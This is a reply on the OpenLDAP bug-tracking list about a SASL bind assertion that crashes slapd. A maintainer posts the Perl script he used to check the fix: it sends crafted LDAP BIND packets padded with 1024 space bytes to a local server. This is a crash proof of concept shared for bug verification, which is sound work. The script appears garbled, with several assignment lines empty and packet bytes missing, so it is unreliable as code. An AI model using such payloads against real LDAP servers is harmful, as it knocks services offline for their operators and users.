[Date Prev][Date Next] [Chronological] [Thread] [Top]

Re: (ITS#4740) SASL bind assert

bthomas@google.com wrote:
> ------=_Part_8120_20176863.1164676496288
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
> Content-Transfer-Encoding: 7bit
> Content-Disposition: inline
> Hello,
> It would appear from my testing that this bug is not fixed. I have compiled
> and installed 2.3.30 and verified that my version of getdn.c ( has
> the fixes that were introduced in 1.134. However, a nessus scan that
> attempts to exploit this bug still succeeds in crashing slapd, with debug
> output attached below (I've snipped the actual data passsed in, suffice to
> say it's 255 0x20's).
> I'm happy to provide any other information as needed. I've taken a look at
> the diffs but haven't been able to find what the problem is.

This is the perl script I used to verify the bug here. slapd works fine 
for me with this. If you can tell us how to reproduce the crash, we can 
investigate further.

use IO::Socket;

         my $host = "localhost";
         my $port = 9011;

         my $sock = IO::Socket::INET->new(
                         Proto   => "tcp",
                         PeerAddr => $host,
                         PeerPort => $port, )
                         or die "Error creating socket";

         print "Sending LDAP BIND request...\n";

         $s .= "\x08\x43\x52\x41\x4d\x2d\x4d\x44\x35";
                 print $sock $s;

         my $buf = '                                        ';
         read( $sock, $buf, 24 );

         $s  = 
         $s .= 
         $s .= "\x82\x04\x00";
         $s .= "\x20" x 1024;

         print "Sending second LDAP BIND request...\n";

         print $sock $s;
         close $sock;

         print "Done\n";

   -- Howard Chu
   Chief Architect, Symas Corp.  http://www.symas.com
   Director, Highland Sun        http://highlandsun.com/hyc
   OpenLDAP Core Team            http://www.openldap.org/project/